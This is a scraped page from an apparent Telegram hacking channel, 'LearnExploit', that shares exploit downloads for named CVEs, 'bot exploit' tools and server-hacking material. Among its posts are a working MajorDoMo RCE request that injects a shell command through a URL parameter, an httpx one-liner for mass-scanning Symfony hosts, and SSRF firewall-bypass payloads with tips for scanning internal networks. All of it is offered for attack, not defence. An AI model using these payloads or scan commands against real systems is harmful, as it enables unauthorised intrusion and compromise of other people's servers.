0Day.Today | Learn Exploit | Zero World | Dark web |
18.6K subscribers
1.21K photos
116 videos
487 files
1.24K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
Marijuana Exploit 🍀

⬇️ Download

🔒 @LearnExploit

#Exploit #Bot

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
6🆒3👎2👍1
Discord vc exploit to crash vcs

Github

#discord #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
👍51
This media is not supported in your browser
VIEW IN TELEGRAM
⚡️ Cloud7 Bot Exploit ⚡️

Run Script with Python 2.7

📊 Recommended:

python -m pip install requests

python -m pip install bs4

python -m pip install colorama

python -m pip install lxml

⬇️ Download
🔒 @LearnExploit

#Exploit #Tools

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
16❤‍🔥2👍2🔥2👎1
A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)

Github

#RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
5👍1
CVE-2024-20767.py
1.4 KB
CVE-2024-20767 Adobe ColdFusion


#Cve #Exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army
1🔥1
CVE-2024-27198 & CVE-2024-27199 AUTHENTICATION BYPASS
Rce in jetbrains teamcity exploit

Github

Github

#exploit #Cve #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍5❤‍🔥1
CVE-2024-26630

Linux 6.5 Kernel Pointer Leak ❗️

Link

#Cve #linux #Exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥21
MajorDoMo thumb RCE

GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23 %3B HTTP/1.1``

#rce #Poc #Exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍3❤‍🔥2
Windows 11 24H2 NT Exploit

Github

#Windows #Exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥7
Exploits Symfony

httpx -l hosts.txt -path /_fragment?_path=_controller=phpcredits&flag=-1 -threads 100 -random-agent -x GET -tech-detect -status-code -follow-redirects -title -mc 200 -match-regex "PHP Credits"

Github

#Exploit #RCE
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3
Zero Exploiter 🔥 Bot Exploit 💎

Share and subscribe

Made with ❤️

#Priv8 #Exploit
——————‌
0Day.Today
@LearnExploit
@A3L3_KA4
🔥72👍1👏1
Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path

Exploit Author: Ex3ptionaL

Exploit Date: 2024-04-01

Vendor: https://www.eset.com

Version: 17.0.16.0

Tested on OS: Microsoft Windows 10 pro x64

🕷 Exploit-db

⬇️ Download

#Exploit #ESET #NOD32

📣 T.me/BugCod3
📣 T.me/LernExploit
📣 T.me/A3l3_KA4
Please open Telegram to view this post
VIEW IN TELEGRAM
63👍3🔥2❤‍🔥1
SSRF Payloads To Bypass Firewall

Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):

1) Bypass SSRF with CIDR:
http://127.127.127.127
http://127.0.0.0

2) Bypass using rare address:
http://127.1
http://0

3) Bypass using tricks combination:
http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3

4) Bypass against a weak parser:
http://127.1.1.1:80\@127.2.2.2:80/

5) Bypass localhost with [:]:
http://[::1:80/
http://0000::1:80/

Let's remind ourselves what SSRF vulnerabilities are and what can we do with them. In general, SSRF allows us to:

Access services on the loopback interface running on the remote server. Scan internal network an potentially interact with the discovered services
Read local files on the server using file:// protocol handler
Move laterally / pivoting into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from external URL (running on a 3rd party website), we can try to load internal resources accessible by the vulnerable web application.

For example:
We discover that the following URL works:


https://example.com: 8000/page?
user=&link=https://127.0.0.1:8000


We can then run Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover alive IPs in the internal network

#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
💔3👍2
Article introducing and exploiting 4 bugs
مقاله ی معرفی و اکسپلویت کردن 4 باگ :

1. path traversal
2. business logic
3. single sign-on (SSO) Misconfiguration
4. Insecure Deserialization


#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO

♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
Article introducing and exploiting 4 bugs.pdf
376.6 KB
Article introducing and exploiting 4 bugs
مقاله ی معرفی و اکسپلویت کردن 4 باگ :

1. path traversal
2. business logic
3. single sign-on (SSO) Misconfiguration
4. Insecure Deserialization


#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO

♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit